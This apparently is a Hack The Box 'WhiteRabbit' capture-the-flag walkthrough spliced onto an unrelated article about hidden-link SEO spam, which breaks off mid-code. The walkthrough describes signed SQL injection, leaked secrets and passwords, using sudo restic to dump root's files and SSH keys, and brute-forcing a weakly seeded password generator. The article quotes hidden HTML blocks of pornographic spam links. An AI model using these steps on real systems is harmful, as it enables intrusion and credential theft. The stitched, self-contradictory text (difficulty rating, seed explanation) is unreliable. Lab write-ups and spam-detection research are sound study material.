
Hack The Box: WhiteRabbit Machine Walkthrough – Insane Difficulty

By: darknite
Reading Time: 14 minutes

Introduction to WhiteRabbit:

In this writeup, we will explore the “WhiteRabbit” machine from Hack The Box, categorized as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “WhiteRabbit” machine from Hack The Box by achieving the following objectives:

User Flag:

The user flag began with a publicly accessible Uptime Kuma guest dashboard that inadvertently exposed internal service names and subdomains, including Wiki.js, Gophish, and n8n. A leaked n8n workflow JSON file on the unauthenticated Wiki.js instance revealed the exact webhook endpoint, the hardcoded HMAC-SHA256 secret, and an email parameter vulnerable to blind SQL injection. Dumping the database through that injection uncovered the restic repository password from bob’s command history. With that password, a snapshot was restored from the remote restic repository containing bob’s private SSH key from /dev/shm. After gaining access as bob, bob’s NOPASSWD sudo privilege for restic was abused to back up and dump a root-level snapshot that included morpheus’s private SSH key. Finally, SSH access as morpheus allowed reading of the user.txt flag.

Root Flag:

From the morpheus shell, exploration revealed a custom SUID binary at /opt/neo-password-generator/neo-password-generator. The binary was transferred off-box and reverse-engineered, exposing a predictable pseudorandom password generator that used srand() seeded directly from a command-line argument. A signed integer overflow in the seed calculation (1725028842 * 1000 + add) created a small, predictable negative seed space. The binary was faithfully recreated locally, and a brute-force script generated candidate passwords until a valid one was found, granting SSH access as neo. Once inside as neo, sudo -l revealed full passwordless sudo privileges ((ALL : ALL) ALL). A simple sudo su elevated to root, allowing direct access to root.txt and completing the box.

Enumerating the Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.

nmap -sC -sV -oA initial 10.10.11.63

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/whiterabbit]
└──╼ $nmap -sC -sV -oA initial 10.10.11.63
# Nmap 7.94SVN scan initiated Fri Dec 12 13:57:59 2025 as: nmap -sC -sV -oA initial 10.10.11.63
Nmap scan report for 10.10.11.63
Host is up (0.045s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0f:b0:5e:9f:85:81:c6:ce:fa:f4:97:c2:99:c5:db:b3 (ECDSA)
|_  256 a9:19:c3:55:fe:6a:9a:1b:83:8f:9d:21:0a:08:95:47 (ED25519)
80/tcp   open  http    Caddy httpd
|_http-title: Did not follow redirect to http://whiterabbit.htb
|_http-server-header: Caddy
2222/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c8:28:4c:7a:6f:25:7b:58:76:65:d8:2e:d1:eb:4a:26 (ECDSA)
|_  256 ad:42:c0:28:77:dd:06:bd:19:62:d8:17:30:11:3c:87 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 12 13:58:09 2025 -- 1 IP address (1 host up) scanned in 10.19 seconds
 

Analysis:

  • 22/tcp (SSH): Standard OpenSSH service on Ubuntu, likely requiring valid credentials for remote access.
  • 80/tcp (HTTP): Caddy web server redirecting to whiterabbit.htb, indicating name-based virtual hosting.
  • 2222/tcp (SSH): Secondary OpenSSH instance on a non-standard port, suggesting an alternate or restricted access path.

Web Enumeration:

Perform web enumeration to discover potentially exploitable directories and files.

Visiting http://whiterabbit.htb, we’re presented with the public landing page of “White Rabbit – Pentesting Services”, a professional marketing site featuring a stylised rabbit mascot and sections about their penetration testing offerings.

Browsing the β€œLatest News” section on the main whiterabbit.htb site, we see a blog-style update explicitly mentioning the use of Uptime Kuma for uptime and network monitoring during client pentesting engagements, directly confirming its deployment.

Running Gobuster in VHOST enumeration mode against whiterabbit.htb using a medium-sized subdomain wordlist, the tool completes its scan with nearly 5,000 entries tested and reports no additional virtual hosts discovered.

Executing ffuf with Host-header fuzzing (Host: FUZZ.whiterabbit.htb) and filtering for non-zero response sizes, we successfully identify a hidden virtual host that returns a 302 redirect.

Initial Web Exposure via Uptime Kuma

Accessing http://status.whiterabbit.htb/dashboard displays the Uptime Kuma login page with a standard username/password form and a “Remember me” option.

Uptime Kuma – Open-Source Uptime Monitoring

Uptime Kuma is a self-hosted, open-source monitoring tool that tracks the uptime and performance of websites, servers, and online services. It provides a real-time web dashboard, historical statistics, and alerts via channels like email, Discord, or Slack when services go down. Supporting multiple protocols such as HTTP(S), TCP, and Ping, it lets users monitor critical systems without relying on third-party services, giving full control over their data and notifications.

Viewing the source of http://status.whiterabbit.htb/dashboard, we see the standard Uptime Kuma login page source, featuring typical meta tags, Vue.js bundles, the characteristic “Uptime Kuma” title, and the noscript message prompting JavaScript enablement.

The status page’s monitors reference n8n; visiting https://n8n.io shows the official landing page for n8n, a fair-code workflow automation platform that White Rabbit runs in production.

Discovering the Uptime Kuma version

Inspecting the bundled JavaScript at /assets/index-CYsZUV7d.js, we quickly spot the hardcoded frontendVersion string returning “1.23.13”.

The official Uptime Kuma public status page provides real-time visibility into the operational state of monitored systems. It displays uptime metrics, incident history, and performance data, allowing stakeholders to quickly assess service health and track any disruptions without requiring authentication.

Trying /status at http://status.whiterabbit.htb/status returns a blank page, but based on the Uptime Kuma demo, it’s probably a general status endpoint.

Discovery of Internal Services

An unauthenticated Uptime Kuma page at /status/temp publicly lists all monitored services as operational.

Wiki.js Information Disclosure

When you land on http://a668910b5514e.whiterabbit.htb, Wiki.js greets you with its clean, modern homepage. A visible “ToDo” page lists just one item: the staff still needs to add authentication.

When you visit http://ddb09a8558c9.whiterabbit.htb, Gophish welcomes you with its clean login page. This open-source phishing framework displays only the iconic fishing-hook logo and a straightforward “Username / Password” sign-in form.

GoPhish Webhooks workflow

An internal Wiki.js article at /gophish_webhooks documents Gophish–n8n workflows, including screenshots and the full exported JSON.

Diving deeper into the leaked workflow notes, we read the full explanation of signature processing, user validation, phishing-score updates, and the existence of a debug node clearly labelled “DEBUG: REMOVE SOON”.

The exported n8n documentation includes a legitimate Gophish POST example with the required signature header and a “Clicked Link” payload.

When you save the leaked n8n workflow locally, the suggested filename “gophish_to_phishing_score_database.json” immediately reveals its purpose.

n8n Webhook Authentication Bypass

Visiting the n8n instance at http://28efa87fdf.whiterabbit.htb, we’re presented with the standard n8n login screen prompting for email and password, along with a “Critical update available” banner.

When you attempt to call the raw webhook URL directly at /webhook/d96af3a4-21bd-4bcb-bd34-37bfc67dfdid, n8n returns a 404 JSON response.

SQL Injection via Signed Webhook

Sending a raw GET request to the same webhook path returns another 404 with the same helpful error message and a hint to activate the workflow via the top-right toggle.

The replayed webhook returned 200 OK with “User is not in database,” indicating an active endpoint that rejected the test payload.

The exported workflow includes β€œno signature” and β€œinvalid signature” branches that expose plain-text errors for missing or incorrect x-gophish-signature headers.

A leaked n8n workflow node exposes a hard-coded HMAC-SHA256 secret used for Gophish webhook signing.

Generating an HMAC-SHA256 Signature from a Minified JSON Payload Using CyberChef

Using CyberChef, we generate the correct HMAC-SHA256 by signing the minified JSON body with the UTF-8 secret jBiTicmv7gxc6IS. This produces the signature 2db3eee889e9ee285ce57acbe51caae7dd4863ab9cadf21be4262be8f9fb5ff7.

The finalised payload includes the correct secret, minified JSON, and a valid HMAC, enabling data extraction or command execution via OUTFILE.
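The signing scheme described above, as an added example (not code from the writeup, Gophish or n8n): it computes the HMAC-SHA256 over the minified body exactly as CyberChef was fed it, and shows the verification an n8n webhook node should perform before touching the database. The secret and the event payload are constructed placeholders, and the sha256= header prefix is assumed.

```python
"""Gophish-style webhook signing and verification (added example)."""
import hashlib
import hmac
import json

SECRET = b"example-shared-secret"   # constructed placeholder, not the writeup's leaked value
PREFIX = "sha256="                  # header prefix assumed for X-Gophish-Signature

def minify(payload):
    """Serialise without whitespace, the form CyberChef was fed in the writeup."""
    return json.dumps(payload, separators=(",", ":")).encode("utf-8")

def sign(body, secret=SECRET):
    """Header value the sender attaches: HMAC-SHA256 over the raw request body."""
    return PREFIX + hmac.new(secret, body, hashlib.sha256).hexdigest()

def verify(body, header, secret=SECRET):
    """What the n8n node should do before touching the database: recompute the
    MAC over the bytes actually received and compare in constant time."""
    if not header or not header.startswith(PREFIX):
        return False                      # the workflow's "no signature" branch
    provided = header[len(PREFIX):]
    if not provided.isascii():
        return False                      # compare_digest rejects non-ASCII str
    expected = hmac.new(secret, body, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, provided)

# Constructed "Clicked Link" event; the key names are an assumption.
EVENT = {"campaign_id": 1, "email": "bob@whiterabbit.htb",
         "message": "Clicked Link", "details": "{}"}

def demo():
    body = minify(EVENT)
    header = sign(body)
    pretty = json.dumps(EVENT, indent=2).encode("utf-8")   # same JSON, different bytes
    return {
        "minified_ok": verify(body, header),
        "pretty_printed_ok": verify(pretty, header),        # False: MAC covers raw bytes
        "edited_body_ok": verify(body.replace(b"bob", b"eve"), header),   # False
        "missing_header_ok": verify(body, ""),              # False
    }

if __name__ == "__main__":
    print(demo())
```

The pretty-printed case is why the writeup had to minify the JSON before signing: the MAC is over bytes, not over the JSON's meaning.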

Testing Request Integrity with Burp Suite

We craft the first request in Burp using the original payload and an incorrect signature. The server returns the expected “Provided signature is not valid” response.

We used CyberChef to recreate the minified JSON and compute a valid HMAC for the malicious payload.

A basic SQLi in the email field using ExtractValue returned a partial database list via an error message.

When you send the fully signed SQL injection request, the server responds with another detailed MySQL error.

We send a signed SQL injection payload to the n8n webhook. This triggers an XPath error that leaks all table names in the phishing database, including victims and campaigns. The still-active Gophish → n8n → MySQL chain confirms full blind SQLi exploitation with valid HMAC authentication.

We execute the final signed payload to extract full command history entries. These include usernames and timestamps, retrieved through the still-active n8n webhook → MySQL injection chain.

Opening the sql.py exploit script reveals a clean, fully automated Python tool. It loops 1,500 times to blind-extract the entire temp.command_log table, including IDs, commands, and dates.

Running the python3 sql.py script, we observe it quickly cycling through timestamps from August 30, 2024. It appears to be enumerating entries from the leaked temp.command_log table.

Credential Discovery from Command Logs

On Parrot OS, we install Restic with sudo apt install restic, fetching the latest version from the official repository. It is now ready to interact with White Rabbit’s backup system.

Attempting to use Restic without proper configuration results in a fatal error. It cannot reach http://75951e6ff.whiterabbit.htb/config, confirming the backup server runs on that subdomain.

To authenticate with the Restic repository, we create a password file containing ygcsvcuMdfZ89yaRL1TKhe5jAmth7vvxw and set its permissions to 600. We then export the RESTIC_REPOSITORY and RESTIC_PASSWORD_FILE environment variables.

Running restic snapshots, we confirm a single snapshot exists: ID 272cad5 from 2025-03-06, tagged with the path /dev/shm/bob/ssh.

Lateral Movement to bob

Using restic restore latest, we authenticated and restored snapshot 272cad5 from /dev/shm/bob/ssh on the remote repository.

Landing inside the restored snapshot, we find ourselves in /home/dark/Documents/htb/whiterabbit/restored_data/dev/shm/bob/ssh – a clear sign we’ve successfully recovered bob’s SSH directory from a restic backup.

Landing in the restored snapshot directory, we see a single file: bob.7z – the compressed archive containing bob’s SSH credentials that was accidentally left in /dev/shm.

Recovering Credentials from the 7-Zip Archive

Attempting to extract a crackable hash from the 7z archive with 7z2john, we hit the classic “Can’t locate Compress::Raw::Lzma” error because the required Perl module is missing on Parrot OS.

We install the missing LZMA Perl module with sudo apt install libcompress-raw-lzma-perl, fixing 7z2john and allowing clean hash extraction.

We ran 7z2john against bob.7z to extract its hash and saved Bob’s password hash to hash.txt.

Finally, we viewed the extracted hash with cat hash.txt, revealing Bob’s full password hash: $7z$.... Strictly speaking unnecessary at this point, but satisfying to confirm.

John The Ripper quickly identifies the password as lq2w3e4r5t6y (a common keyboard-walk pattern shifted down one row, present in rockyou).

Inspecting Contents of bob.7z

Extracting the 7z archive with 7z x, we successfully decompress bob.7z after providing the password, revealing bob’s private key and config files.

Listing the restored directory post-extraction, we now have bob, bob.7z, bob.pub, config, and hash.txt – everything we need to own the box.

Pivoting to bob over SSH

Fixing permissions and SSHing directly as bob, we run chmod 600 bob and ssh -i bob bob@10.10.11.63 – instant shell, no password needed.

Checking bob’s sudo privileges, we run sudo -l and discover bob can run /usr/bin/restic as root with NOPASSWD – the golden ticket for privilege escalation.

Initialising our own restic repository as bob, we create a repository named dark (ID f22eeb5f29) after providing a password of our choosing, ready for our own backups.

Running sudo restic backup /root as bob, we create a new snapshot 2c446829 of the entire root directory in our personal repository dark – adding 4 new files and 3 new directories (including /root/morpheus and its keys), all without ever needing root’s password.

Listing the latest snapshot 2c446829 as bob, we see a full backup of /root including .bashrc, .profile, .ssh, and crucially /root/morpheus and /root/morpheus.pub.

Dumping morpheus’s private key from the root snapshot, we use restic dump on path /root/morpheus and extract the full OpenSSH private key – proof that the sudo restic rule lets bob read anything root can.

Pivot to morpheus

Viewing the recovered Morpheus private key locally, we cat morpheus and see a pristine OpenSSH private key – root access is now just an SSH away.

SSHing in as morpheus using the recovered key, we successfully authenticate to morpheus@10.10.11.63 and land directly on the minimized Ubuntu 24.04 system.

Landing the final blow as morpheus on WhiteRabbit, we run cat user.txt and reveal the user flag.

Escalate to Root Privileges Access

Privilege Escalation:

Failing sudo as morpheus, we repeatedly get “Sorry, try again” – confirming no easy password reuse and forcing us to look deeper for privilege escalation.

SUID Binary Discovery

Exploring /opt as morpheus, we discover the neo-password-generator directory containing a single executable – clearly the SUID binary we’re hunting.

Reverse Engineering the Binary

SCP-ing the neo-password-generator binary back to our machine, we successfully pull the 15KB ELF for static and dynamic analysis.

Checking the file type of neo-password-generator, we confirm it’s a 64-bit LSB PIE executable, dynamically linked, not stripped – perfect for reverse engineering.

PRNG Design Analysis

Vulnerability 1: Integer Truncation in Seed Calculation (Critical Exploit Path)

The seed is calculated as tv_sec * 1000 + tv_usec / 1000, producing a 64-bit millisecond timestamp (approximately 1.7 trillion in late 2025). While this value fits safely within a signed 64-bit integer, it is commonly truncated when passed to srand(), either by casting to a 32-bit unsigned integer or via a modulo operation. This truncation silently discards the higher bits, reducing the effective seed space from trillions of possibilities to at most 4.29 billion, and often far fewer in practice. As a result, what appears to be a large entropy source becomes a manageable brute-force space, making this the primary exploitation vector.

Vulnerability 2: Predictable Seed from Low-Entropy Source

The seed relies entirely on the current system time in milliseconds, which provides very little entropy. An attacker with approximate knowledge of when the program was executed (derived from logs, challenge timing, or user interaction) can constrain the search window to a narrow range such as ±10–60 seconds. This reduces the number of candidate seeds to roughly 20,000–120,000. Because PRNGs are deterministic, testing this limited range is sufficient to reliably reproduce the generated output.

Vulnerability 3: Use of Weak, Non-Cryptographic PRNG

The password generation uses the standard rand() function seeded via srand(), which is not designed for security purposes. It exhibits predictable output patterns, weak lower bits, and easily reproducible sequences. Even if seeded correctly, rand() remains unsuitable for password generation. Combined with the truncated and time-based seed, an attacker can replicate the algorithm and regenerate the password with minimal effort, fully compromising the mechanism.

Grepping /etc/passwd for shell users, we spot root, neo (UID/GID 1000), and morpheus (UID/GID 1001) – hinting neo might be the intended escalation target.

Viewing the full decompiled dark.c source, we see a predictable password generator using srand(param_1) and rand() % 62 over a fixed charset, seeded directly from the command-line argument.

Running gcc on the decompiled dark.c, we hit an integer overflow warning on the line generate_password(1725028842*1000 + add) – a classic seed manipulation hint.

Executing our reconstructed dark binary, we successfully generate a password like L70f2aFEohexXuk07tEw… – proving our reverse engineering is accurate and ready for seed brute-force.

Dumping our local dark binary output to pass.txt, we prepare the reconstructed neo-password-generator for transfer and analysis. Spotting the overflow in the seed calculation, we realize 1725028842 * 1000 overflows a signed int, giving us a predictable negative seed range to brute-force neo’s password.
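An added example (not the writeup’s dark.c) that emulates the 32-bit int arithmetic of the seed expression tv_sec * 1000 + tv_usec / 1000 in Python, so the overflow on the constant above and the size of the resulting seed space can be checked without the binary. It generates no passwords; the charset and rand() are deliberately left out.

```python
"""32-bit emulation of the neo-password-generator seed expression (added example)."""

INT_MAX = 2**31 - 1

def to_int32(value):
    """Wrap an arbitrary Python int to a two's-complement 32-bit C int."""
    value &= 0xFFFFFFFF
    return value - 2**32 if value > INT_MAX else value

def c_seed(tv_sec, tv_usec):
    """seed = tv_sec * 1000 + tv_usec / 1000 with C int semantics (32-bit wrap)."""
    # The multiplication overflows first; gcc's warning on the constant form
    # 1725028842*1000 is exactly this step.
    return to_int32(to_int32(tv_sec * 1000) + tv_usec // 1000)

def seed_space(tv_sec_lo, tv_sec_hi):
    """Every distinct seed reachable between two epoch seconds [lo, hi)."""
    return {c_seed(s, us) for s in range(tv_sec_lo, tv_sec_hi)
            for us in range(0, 1_000_000, 1000)}   # one seed per millisecond

def truncation_collision(ms_timestamp):
    """Two 64-bit ms timestamps 2**32 ms (~49.7 days) apart collapse to one seed."""
    return to_int32(ms_timestamp) == to_int32(ms_timestamp + 2**32)

def report(tv_sec=1725028842, window_s=10):
    """Seed the writeup's constant produces, plus the candidate count for a +/- window."""
    base = c_seed(tv_sec, 0)
    return {"base_seed": base,
            "overflowed": tv_sec * 1000 > INT_MAX,   # the true 64-bit value does not fit an int
            "candidates_in_window": len(seed_space(tv_sec - window_s, tv_sec + window_s))}

if __name__ == "__main__":
    print(report())   # base_seed -1548010992, 20000 candidates for +/- 10 s
```

With a 10 second window the whole seed space is 20,000 values, which is why the writeup’s brute force finishes quickly; a CSPRNG (getrandom on Linux) has no such window.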

Authentication as neo

Testing multiple generated passwords via ssh, we see a long list of failed Paramiko errors until the correct one grants “Linux – Shell access!”.

Successfully authenticating as neo, we bypass the banner errors and gain a stable shell on neo@10.10.11.63.

Running sudo -l as neo, we discover the nuclear option: (ALL : ALL) ALL – neo can execute any command as any user, including root, without a password.

Switching to root with plain sudo su as neo, we seamlessly become root at /home/neo# – confirming neo has unrestricted sudo access.

Escalating instantly as neo with sudo -s, we drop straight into a root shell at /home/neo# – no password needed.

Catting root.txt from neo’s home as root, we uncover the root flag.

The post Hack The Box: WhiteRabbit Machine Walkthrough – Insane Difficulty appeared first on Threatninja.net.

SEO spam and hidden links: how to protect your website and your reputation

When analyzing the content of websites in an attempt to determine what category it belongs to, we sometimes get an utterly unexpected result. It could be the official page of a metal structures manufacturer or online flower shop, or, say, a law firm website, with completely neutral content, but our solutions would place it squarely in the “Adult content” category. On the surface, it is completely unclear how our systems arrived at that verdict, but one look at the content categorization engine’s page analysis log clears it up.

Invisible HTML block, or SEO spam

The website falls into the questionable category because it contains an HTML block with links to third-party sites, invisible to regular users. These sites typically host content of a certain kind – which, in our experience, is most often pornographic or gambling materials – and in the hidden block, you will find relevant keywords along with the links. These practices are a type of Black Hat SEO, or SEO spam: the manipulation of website search rankings in violation of ethical search engine optimization (SEO) principles. Although there are many techniques that attackers use to raise or lower websites in search engine rankings, we have encountered hidden blocks more frequently lately, so this is what this post focuses on.

Website owners rarely suspect a problem until they face obvious negative consequences, such as a sharp drop in traffic, warnings from search engines, or complaints from visitors. Those who use Kaspersky solutions may see their sites blocked due to being categorized as prohibited, a sign that something is wrong with them. Our engine detects both links and their descriptions that are present in a block like that.

How hidden links work

Hyperlinks that are invisible to regular users but still can be scanned by various analytical systems, such as search engines or our web categorization engine, are known as “hidden links”. They are often used for scams, inflating website rankings (positions in search results), or pushing down the ranking of a victim website.

To understand how this works, let us look at how today’s SEO functions in the first place. A series of algorithms is responsible for ranking websites in search results, such as those served by Google. The oldest and most relevant one to this article is known as PageRank. The PageRank metric, or weight in the context of this algorithm, is a numerical value that determines the importance of a specific page. The higher the number of links from other websites pointing to a page, and the greater those websites’ own weights, the higher the page’s PageRank.

So, to boost their own website’s ranking in search results, the malicious actor places hidden links to it on the victim website. The higher the victim website’s PageRank, the more attractive it is to the attacker. High-traffic platforms like blogs or forums are of particular interest to them.

However, PageRank is no longer the only method search engines use to measure a website’s value. Google, for example, also applies other algorithms, such as the artificial intelligence-based RankBrain or the BERT language model. These algorithms use more sophisticated metrics, such as Domain Authority (that is, how much authority the website has on the subject the user is asking about), link quality, and context. Placing links on a website with a high PageRank can still be beneficial, but this tactic has a severely limited effect due to advanced algorithms and filters aimed at demoting sites that break the search engine’s rules. Examples of these filters are as follows:

  • Google Penguin, which identifies and penalizes websites that use poor-quality or manipulative links, including hidden ones, to boost their own rankings. When links like these are detected, their weight can be zeroed out, and the ranking may be lowered for both sites: the victim and the spam website.
  • Google Panda, which evaluates content quality. If the website has a high PageRank, but the content is of low quality, duplicated, auto-generated, or otherwise substandard, the site may be demoted.
  • Google SpamBrain, which uses machine learning to analyze HTML markup, page layouts, and so forth to identify manipulative patterns. This algorithm is integrated into Google Penguin.

What a Black Hat SEO block looks like in a page’s HTML markup

Let us look at some real examples of hidden blocks we have seen on legitimate websites and determine the attributes by which these blocks can be identified.

Example 1

<div style="display: none;">
افلام Ψ³ΩƒΨ³ Ψ§ΨΉΨͺΨ΅Ψ§Ψ¨ <a href="https://www.azcorts.com/" rel="dofollow" target="_self">azcorts.com</a> Ω‚Ω†ΩˆΨ§Ψͺ Ψ¬Ω†Ψ³ΩŠΨ©
free indian porn com <a href="https://porngun.mobi" target="_self">porngun.mobi</a> xharmaster
ηŸ³εŽŸθŽ‰η΄… <a href="https://javclips.mobi/" target="_blank" title="javclips.mobi">javclips.mobi</a> けっぱい
bank porn <a href="https://pimpmpegs.net" target="_self" title="pimpmpegs.net free video porn">pimpmpegs.net</a> wwwporm
salamat lyrics tagalog <a href="https://www.teleseryeone.com/" target="_blank" title="teleseryeone.com sandro marcos alexa miro">teleseryeone.com</a> play desi
</div>
<div style="display: none;">
ΩƒΨ³Ω‰ Ψ¨ΩŠΩˆΨ¬ΨΉΩ†Ω‰ <a href="https://www.sexdejt.org/" rel="dofollow">sexdejt.org</a> Ψ³ΩƒΨ³ Ψ³Ψ§Ω†Ω‰
indian sex video bp <a href="https://directorio-porno.com/" rel="dofollow" target="_self" title="directorio-porno.com">directorio-porno.com</a> xvideos indian pussy
swara bhaskar porn <a href="https://greenporn.mobi" title="greenporn.mobi lesbian porn hq">greenporn.mobi</a> kannada sexy video
bp sex full <a href="https://tubepornmix.info" target="_blank" title="tubepornmix.info aloha tube porn video">tubepornmix.info</a> lily sex
pinayflix pamasahe <a href="https://www.gmateleserye.com/" rel="dofollow" target="_blank">gmateleserye.com</a> family feud november 17
</div>
<div style="display: none;">
sunny leone ki bp download <a href="https://eroebony.info" target="_self" title="eroebony.info">eroebony.info</a> hansika xvideos
Ω…ΩˆΩ‚ΨΉ Ψ³ΩƒΨ³ Ψ§ΩŠΨ·Ψ§Ω„Ω‰ <a href="https://bibshe.com/" target="_self" title="bibshe.com Ψ³ΩƒΨ³ Ψ§Ω„ΨΉΨ§Ψ―Ψ© Ψ§Ω„Ψ³Ψ±ΩŠΨ©">bibshe.com</a> ءور Ψ§Ψ­Ω„Ω‰ ΩƒΨ³
raja rani coupon result <a href="https://booketube.mobi" rel="dofollow">booketube.mobi</a> exercise sex videos
indianbadwap <a href="https://likeporn.mobi" rel="dofollow" target="_blank" title="likeporn.mobi free hd porn">likeporn.mobi</a> rabi pirzada nude video
marathi porn vidio <a href="https://rajwap.biz" rel="dofollow" target="_blank" title="rajwap.biz">rajwap.biz</a> www.livesex.com
</div>
This example utilizes a simple CSS style, <div style="display: none;">. This is one of the most basic and widely known methods for concealing content; the parameter display: none; stands for “do not display”. We also see that each invisible <div> section contains a set of links to low-quality pornographic websites along with their keyword-stuffed descriptions. This clearly indicates spam, as the website where we found this block has no relation whatsoever to the type of content being linked to.

Another sign of Black Hat SEO in the example is the attribute rel="dofollow". This instructs search engines that the link carries link juice, meaning it passes weight. Spammers intentionally set this attribute to transfer authority from the victim website to the ones they are promoting. In standard practice, webmasters may, conversely, use rel="nofollow", which signifies that the presence of the link on the site should not influence the ranking of the website where it leads.

Thus, the combination of a hidden block (display: none;) and a set of external pornographic (in this instance) links with the rel="dofollow" attribute unequivocally points to an SEO spam injection.

Note that all <div> sections are concentrated in one spot, at the end of the page, rather than scattered throughout the page code. This block demonstrates a classic Black Hat SEO approach.

Example 2

<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">Ψ³ΩƒΨ³ Ψ§Ω†Ψ¬Ω„ΩŠΨ² <a href="https://wfporn.com/" target="_self" title="wfporn.com افلام Ψ³Ψ­Ψ§Ω‚ Ω…ΨͺΨ±Ψ¬Ω…">wfporn.com</a> Ψ³ΩƒΨ³ ΩƒΩ„Ψ§Ψ³ΩŠΩƒ Ω…ΨͺΨ±Ψ¬Ω…</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">ΩΩŠΩ„Ω… Ψ³ΩƒΨ³ <a href="https://www.keep-porn.com/" rel="dofollow" target="_blank">keep-porn.com</a> Ψ³ΩƒΨ³ Ω‡Ω†Ψ―Ω‰ Ψ§ΨΊΨͺΨ΅Ψ§Ψ¨</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">desi nude tumbler <a href="https://www.desixxxv.net" title="desixxxv.net free hd porn video">desixxxv.net</a> kanpur sexy video</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">www wap sex video com <a href="https://pornorado.mobi" target="_self">pornorado.mobi</a> sexy film video mp4</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">mom yes porn please <a href="https://www.movsmo.net/" rel="dofollow" title="movsmo.net">movsmo.net</a> yes porn please brazzers</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">xxx download hd <a href="https://fuxee.mobi" title="fuxee.mobi">fuxee.mobi</a> fat woman sex</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">bangalore xxx <a href="https://bigassporntrends.com" rel="dofollow" target="_self" title="bigassporntrends.com">bigassporntrends.com</a> sexy video kashmir</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">xnxx sister sex <a href="https://wetwap.info" rel="dofollow" target="_self" title="wetwap.info hd porn streaming">wetwap.info</a> blue film a video</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">tamilschoolsexvideo <a href="https://tubetria.mobi" rel="dofollow" title="tubetria.mobi">tubetria.mobi</a> sex free videos</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">Ψ³ΩƒΨ³ Ω…Ω† Ψ§Ψ¬Ω„ Ψ§Ω„Ω…Ψ§Ω„ Ω…ΨͺΨ±Ψ¬Ω… <a href="https://www.yesexyporn.com/" title="yesexyporn.com فوائد Ω„Ψ­Ψ³ Ψ§Ω„ΩƒΨ³">yesexyporn.com</a> Ω†Ψ³ΩˆΨ§Ω† Ψ΄Ψ±Ω…ΩŠΨ·</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">kamapishi <a href="https://desisexy.org/" target="_blank" title="desisexy.org free porn gay hd online">desisexy.org</a> savita bhabhi xvideo</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">aflamk2 <a href="https://www.pornvideoswatch.net/" target="_self" title="pornvideoswatch.net">pornvideoswatch.net</a> Ω†ΩŠΩƒ Ψ«Ω…ΩŠΩ†Ψ§Ψͺ</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">hentaifox futanari <a href="https://www.hentaitale.net/" target="_blank" title="hentaitale.net pisuhame">hentaitale.net</a> hen hentai</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">video sexy wallpaper <a href="https://povporntrends.com" target="_blank">povporntrends.com</a> bengolibf</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">persona 5 hentai manga <a href="https://www.younghentai.net/" rel="dofollow" target="_self" title="younghentai.net oni hentai">younghentai.net</a> toys hentai</div>
This example demonstrates a slightly more sophisticated approach to hiding the block containing Black Hat SEO content. It suggests an attempt to bypass the automated search engine filters that easily detect the display: none; parameter.

Let us analyze the set of CSS styles: <div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">. The properties position: absolute; height: 0pt; width: 0pt; remove the block from the visible area of the page, while overflow: auto prevents the content from being displayed even if it exceeds zero dimensions. This makes the links inaccessible to humans, but it does not prevent them from being preserved in the DOM (document object model). That’s why HTML code scanning systems, such as search engines, are able to see it.

In addition to the zero dimensions of the block, in this example, just as in the previous one, we see the attribute rel="dofollow", as well as many links to pornographic websites with relevant keywords.
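A scanner that applies the attributes identified in both examples (a hidden container, off-site links, follow-able rel values), and also catches hiding rules declared in a <style> block rather than inline, as an added example that is not the categorization engine’s code. The sample page and its domains are constructed; only the Python standard library is used.

```python
"""Hidden-link SEO spam scanner (stdlib only; added example, sample input constructed)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS declarations that keep content in the DOM but out of sight.
HIDING_PATTERNS = [re.compile(p, re.I) for p in (
    r"display\s*:\s*none",
    r"visibility\s*:\s*hidden",
    r"color\s*:\s*transparent",
    r"(?:height|width|font-size|opacity)\s*:\s*0(?:px|pt|em)?(?=\s*(?:;|!|$))",
    r"(?:left|top|text-indent)\s*:\s*-\d{4,}",   # pushed far off-screen
)]
VOID_TAGS = {"br", "img", "meta", "link", "input", "hr", "area", "base", "col", "source", "wbr"}

def style_hides(css_text):
    """True if a style attribute or rule body contains a hiding declaration."""
    return any(p.search(css_text or "") for p in HIDING_PATTERNS)

def hidden_classes_from_css(css):
    """Class names whose <style> rules hide the element (the class-based technique)."""
    hidden = set()
    for selector, body in re.findall(r"([^{}]+)\{([^{}]*)\}", css):
        if style_hides(body):
            hidden.update(re.findall(r"\.([\w-]+)", selector))
    return hidden

class HiddenLinkScanner(HTMLParser):
    def __init__(self, site_host, hidden_classes):
        super().__init__()
        self.site_host = site_host.lower()
        self.hidden_classes = hidden_classes
        self.stack = []      # one flag per open element: is this subtree hidden?
        self.findings = []

    def _external(self, href):
        host = (urlparse(href).hostname or "").lower()
        return bool(host) and host != self.site_host and not host.endswith("." + self.site_host)

    def handle_starttag(self, tag, attrs):
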